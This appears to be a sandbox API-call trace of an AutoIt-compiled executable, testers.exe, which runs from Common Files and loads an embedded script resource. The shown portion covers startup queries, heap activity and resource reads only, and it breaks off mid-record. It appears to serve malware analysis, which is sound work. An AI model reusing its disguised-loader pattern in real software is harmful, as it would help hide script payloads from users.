\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿéÔä\x97Lüw", lpUsedDefaultChar=0x0) returned 256 [0276.798] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0276.798] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2c4d1c) returned 0x0 [0276.799] RtlSizeHeap (HeapHandle=0x850000, Flags=0x0, MemoryPointer=0x873138) returned 0x80 [0276.799] RtlSizeHeap (HeapHandle=0x850000, Flags=0x0, MemoryPointer=0x873138) returned 0x80 [0276.799] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x3c) returned 0x862240 [0276.799] RtlSizeHeap (HeapHandle=0x850000, Flags=0x0, MemoryPointer=0x873138) returned 0x80 [0276.799] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x863300 [0276.799] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x862a80 [0276.799] GetVersionExW (in: lpVersionInformation=0x77fb28*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x1f1e1d1c, dwMinorVersion=0x23222120, dwBuildNumber=0x27262524, dwPlatformId=0xb1000f, szCSDVersion="\x04") | out: lpVersionInformation=0x77fb28*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0276.799] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x863300 | out: hHeap=0x850000) returned 1 [0276.799] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x86fbc0 [0276.799] GetCurrentProcess () returned 0xffffffff [0276.799] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x77fc78 | out: Wow64Process=0x77fc78) returned 1 [0276.800] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0276.800] GetProcAddress (hModule=0x75990000, lpProcName="GetNativeSystemInfo") returned 0x759b10b5 [0276.800] GetNativeSystemInfo (in: lpSystemInfo=0x77fc44 | out: lpSystemInfo=0x77fc44*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0276.800] FreeLibrary (hLibModule=0x75990000) returned 1 [0276.800] RtlSizeHeap (HeapHandle=0x850000, Flags=0x0, MemoryPointer=0x873138) returned 0x80 [0276.800] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x863300 [0276.800] RtlSizeHeap (HeapHandle=0x850000, Flags=0x0, MemoryPointer=0x873138) returned 0x80 [0276.800] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x863318 [0276.800] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x874038 [0276.800] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x863330 [0276.800] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x874048 [0276.801] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x863348 [0276.801] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x874058 [0276.801] RtlSizeHeap (HeapHandle=0x850000, Flags=0x0, MemoryPointer=0x873138) returned 0x80 [0276.801] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x863360 [0276.801] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x874068 [0276.801] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x863378 [0276.801] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x874078 [0276.801] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x863390 [0276.801] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875088 [0276.801] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8633a8 [0276.801] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8750b0 [0276.801] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8633c0 [0276.801] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8750c0 [0276.801] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8633d8 [0276.801] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8750d0 [0276.801] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8633f0 [0276.801] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8750e0 [0276.801] MapVirtualKeyW (uCode=0x5b, uMapType=0x0) returned 0x5b [0276.801] MapVirtualKeyW (uCode=0x10, uMapType=0x0) returned 0x2a [0276.801] MapVirtualKeyW (uCode=0xa0, uMapType=0x0) returned 0x2a [0276.801] MapVirtualKeyW (uCode=0xa1, uMapType=0x0) returned 0x36 [0276.801] MapVirtualKeyW (uCode=0x11, uMapType=0x0) returned 0x1d [0276.801] MapVirtualKeyW (uCode=0x12, uMapType=0x0) returned 0x38 [0276.801] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x863408 [0276.801] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8750f0 [0276.801] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8754b0 [0276.801] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875100 [0276.801] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8754c8 [0276.801] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875110 [0276.801] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8754e0 [0276.801] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875120 [0276.801] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8754f8 [0276.801] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875130 [0276.802] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x875510 [0276.802] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875140 [0276.802] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x875528 [0276.802] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875150 [0276.802] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x875540 [0276.802] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875160 [0276.802] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x875558 [0276.802] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875170 [0276.802] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x875570 [0276.802] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875180 [0276.802] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875190 [0276.802] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x875588 [0276.802] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8751a0 [0276.802] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8755a0 [0276.802] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8751b0 [0276.802] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8755b8 [0276.802] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8751c0 [0276.802] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8755d0 [0276.802] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8751d0 [0276.802] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8755e8 [0276.802] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8751e0 [0276.802] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8751f0 [0276.802] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc11e [0276.802] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x875600 [0276.802] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875200 [0276.803] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x40) returned 0x862288 [0276.803] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0276.803] OleInitialize (pvReserved=0x0) returned 0x0 [0276.810] RtlSizeHeap (HeapHandle=0x850000, Flags=0x0, MemoryPointer=0x873138) returned 0x80 [0276.810] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x875618 [0276.810] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875220 [0276.810] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Mouse", ulOptions=0x0, samDesired=0x1, phkResult=0x77fc4c | out: phkResult=0x77fc4c*=0xf8) returned 0x0 [0276.810] RegQueryValueExW (in: hKey=0xf8, lpValueName="SwapMouseButtons", lpReserved=0x0, lpType=0x0, lpData=0x77fc68, lpcbData=0x77fc50*=0x8 | out: lpType=0x0, lpData=0x77fc68*=0x30, lpcbData=0x77fc50*=0x4) returned 0x0 [0276.810] RegCloseKey (hKey=0xf8) returned 0x0 [0276.810] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x876390 [0276.810] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875230 [0276.810] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875240 [0276.810] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875250 [0276.810] RtlSizeHeap (HeapHandle=0x850000, Flags=0x0, MemoryPointer=0x873138) returned 0x80 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x875648 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875260 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x8763b8 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875270 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x875660 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875280 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x875678 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875290 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x875690 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8752a0 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8756a8 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8752b0 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8756c0 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8752c0 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8756d8 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8752d0 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8756f0 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8752e0 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x875708 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8752f0 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x875720 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875300 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x875738 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875310 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x875750 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875320 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x875768 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875330 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x875780 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875340 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x875798 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875350 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8757b0 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875360 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8757c8 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875370 [0276.811] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8757e0 [0276.812] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875380 [0276.812] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8757f8 [0276.812] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875390 [0276.812] RtlSizeHeap (HeapHandle=0x850000, Flags=0x0, MemoryPointer=0x873138) returned 0x80 [0276.812] RtlSizeHeap (HeapHandle=0x850000, Flags=0x0, MemoryPointer=0x873138) returned 0x80 [0276.813] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x875810 [0276.813] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8753a0 [0276.814] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x75fc20, nSize=0x7fff | out: lpFilename="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe")) returned 0x20 [0276.814] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x50) returned 0x87a578 [0276.814] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8753b0 [0276.816] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x74fc10, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x0) returned 0x20 [0276.816] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x875810 | out: hHeap=0x850000) returned 1 [0276.816] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x50) returned 0x87a5d0 [0276.816] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a578 | out: hHeap=0x850000) returned 1 [0276.816] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8753b0 | out: hHeap=0x850000) returned 1 [0276.816] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x75fc2c, lpFilePart=0x76fc2c | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x76fc2c*="testers.exe") returned 0x20 [0276.816] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x8763e0 [0276.816] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x875810 [0276.816] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x875828 [0276.817] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8753b0 [0276.817] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AutoIt v3\\AutoIt", ulOptions=0x0, samDesired=0x1, phkResult=0x76fc48 | out: phkResult=0x76fc48*=0x0) returned 0x2 [0276.817] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x875828 | out: hHeap=0x850000) returned 1 [0276.817] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8753b0 | out: hHeap=0x850000) returned 1 [0276.817] RtlSizeHeap (HeapHandle=0x850000, Flags=0x0, MemoryPointer=0x873138) returned 0x80 [0276.817] RtlSizeHeap (HeapHandle=0x850000, Flags=0x0, MemoryPointer=0x873138) returned 0x80 [0276.817] RtlSizeHeap (HeapHandle=0x850000, Flags=0x0, MemoryPointer=0x873138) returned 0x80 [0276.817] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x875828 [0276.817] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8753b0 [0276.818] RtlSizeHeap (HeapHandle=0x850000, Flags=0x0, MemoryPointer=0x873138) returned 0x80 [0276.818] IsThemeActive () returned 0x1 [0276.818] SystemParametersInfoW (in: uiAction=0x2000, uiParam=0x0, pvParam=0x77fc6c, fWinIni=0x0 | out: pvParam=0x77fc6c) returned 1 [0276.818] SystemParametersInfoW (in: uiAction=0x2001, uiParam=0x0, pvParam=0x0, fWinIni=0x2 | out: pvParam=0x0) returned 1 [0276.818] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x875840 [0276.818] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8753c0 [0276.818] GetCurrentDirectoryW (in: nBufferLength=0x7fff, lpBuffer=0x76fc40 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0276.818] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x875858 [0276.818] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8753d0 [0276.818] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x74fba0, nSize=0x7fff | out: lpFilename="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe")) returned 0x20 [0276.818] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x50) returned 0x87a578 [0276.818] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8753e0 [0276.820] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x73fb90, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x0) returned 0x20 [0276.820] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x863348 | out: hHeap=0x850000) returned 1 [0276.820] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x50) returned 0x87a628 [0276.820] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a578 | out: hHeap=0x850000) returned 1 [0276.820] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8753e0 | out: hHeap=0x850000) returned 1 [0276.820] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x40) returned 0x8622d0 [0276.820] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8753e0 [0276.820] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0276.820] GetProcAddress (hModule=0x75990000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x759bd650 [0276.820] Wow64DisableWow64FsRedirection (in: OldValue=0x75fba4 | out: OldValue=0x75fba4*=0x0) returned 1 [0276.820] FreeLibrary (hLibModule=0x75990000) returned 1 [0276.820] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x18) returned 0x87a578 [0276.820] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x75fa40, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0276.821] GetFileType (hFile=0xf8) returned 0x1 [0276.821] LoadLibraryExW (lpLibFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", hFile=0x0, dwFlags=0x2) returned 0x290000 [0276.821] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0276.821] GetProcAddress (hModule=0x75990000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x759bd668 [0276.821] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0276.821] FreeLibrary (hLibModule=0x75990000) returned 1 [0276.821] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10000) returned 0x87a680 [0276.822] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8753f0 [0276.822] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x75fc00 | out: ppstm=0x75fc00*=0x876430) returned 0x0 [0276.823] FindResourceExW (hModule=0x290000, lpType=0xa, lpName="SCRIPT", wLanguage=0x0) returned 0x358528 [0276.823] LoadResource (hModule=0x290000, hResInfo=0x358528) returned 0x3607b8 [0276.823] SizeofResource (hModule=0x290000, hResInfo=0x358528) returned 0x93fa [0276.823] LockResource (hResData=0x3607b8) returned 0x3607b8 [0276.823] ISequentialStream:RemoteWrite (in: This=0x876430, pv=0x3607b8*=0xa3, cb=0x93fa, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0276.823] IStream:RemoteSeek (in: This=0x876430, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0276.823] IStream:RemoteSeek (in: This=0x876430, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0276.824] ISequentialStream:RemoteRead (in: This=0x876430, pv=0x87a680, cb=0x18, pcbRead=0x75fb2c | out: pv=0x87a680*=0xa3, pcbRead=0x75fb2c*=0x18) returned 0x0 [0276.824] IStream:RemoteSeek (in: This=0x876430, dlibMove=0x14, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0276.824] ISequentialStream:RemoteRead (in: This=0x876430, pv=0x75fb70, cb=0x4, pcbRead=0x75fb2c | out: pv=0x75fb70*=0x45, pcbRead=0x75fb2c*=0x4) returned 0x0 [0276.824] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8753f0 | out: hHeap=0x850000) returned 1 [0276.824] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a680 | out: hHeap=0x850000) returned 1 [0276.824] ISequentialStream:RemoteRead (in: This=0x876430, pv=0x75fb94, cb=0x10, pcbRead=0x75fb6c | out: pv=0x75fb94*=0x4d, pcbRead=0x75fb6c*=0x10) returned 0x0 [0276.824] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x75fa68 | out: lpSystemTimeAsFileTime=0x75fa68*(dwLowDateTime=0x45bac970, dwHighDateTime=0x1d661be)) [0276.824] IStream:RemoteSeek (in: This=0x876430, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0276.824] IStream:RemoteSeek (in: This=0x876430, dlibMove=0x28, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0276.824] ISequentialStream:RemoteRead (in: This=0x876430, pv=0x75f4e8, cb=0x4, pcbRead=0x75f2ac | out: pv=0x75f4e8*=0x6b, pcbRead=0x75f2ac*=0x4) returned 0x0 [0276.824] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x75f1a8 | out: lpSystemTimeAsFileTime=0x75f1a8*(dwLowDateTime=0x45bac970, dwHighDateTime=0x1d661be)) [0276.824] ISequentialStream:RemoteRead (in: This=0x876430, pv=0x75f4f0, cb=0x4, pcbRead=0x75f2ac | out: pv=0x75f4f0*=0xa6, pcbRead=0x75f2ac*=0x4) returned 0x0 [0276.824] ISequentialStream:RemoteRead (in: This=0x876430, pv=0x75f2d8, cb=0x34, pcbRead=0x75f2ac | out: pv=0x75f2d8*=0xe1, pcbRead=0x75f2ac*=0x34) returned 0x0 [0276.824] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x75f1a8 | out: lpSystemTimeAsFileTime=0x75f1a8*(dwLowDateTime=0x45bac970, dwHighDateTime=0x1d661be)) [0276.824] ISequentialStream:RemoteRead (in: This=0x876430, pv=0x75f4f0, cb=0x4, pcbRead=0x75f2ac | out: pv=0x75f4f0*=0x17, pcbRead=0x75f2ac*=0x4) returned 0x0 [0276.824] ISequentialStream:RemoteRead (in: This=0x876430, pv=0x75f51c, cb=0x6e, pcbRead=0x75f2ac | out: pv=0x75f51c*=0xf9, pcbRead=0x75f2ac*=0x6e) returned 0x0 [0276.824] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x75f1a8 | out: lpSystemTimeAsFileTime=0x75f1a8*(dwLowDateTime=0x45bac970, dwHighDateTime=0x1d661be)) [0276.824] ISequentialStream:RemoteRead (in: This=0x876430, pv=0x75fba3, cb=0x1, pcbRead=0x75f4f4 | out: pv=0x75fba3*=0x0, pcbRead=0x75f4f4*=0x1) returned 0x0 [0276.824] ISequentialStream:RemoteRead (in: This=0x876430, pv=0x75fb9c, cb=0x4, pcbRead=0x75f4f4 | out: pv=0x75fb9c*=0xbc, pcbRead=0x75f4f4*=0x4) returned 0x0 [0276.824] ISequentialStream:RemoteRead (in: This=0x876430, pv=0x75fb9c, cb=0x4, pcbRead=0x75f4f4 | out: pv=0x75fb9c*=0xbc, pcbRead=0x75f4f4*=0x4) returned 0x0 [0276.824] ISequentialStream:RemoteRead (in: This=0x876430, pv=0x75fb9c, cb=0x4, pcbRead=0x75f4f4 | out: pv=0x75fb9c*=0x84, pcbRead=0x75f4f4*=0x4) returned 0x0 [0276.824] IStream:RemoteSeek (in: This=0x876430, dlibMove=0x10, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0276.824] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x1) returned 0x8753f0 [0276.824] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x1) returned 0x875400 [0276.824] ISequentialStream:RemoteRead (in: This=0x876430, pv=0x875400, cb=0x0, pcbRead=0x75f4f4 | out: pv=0x875400*=0x6e, 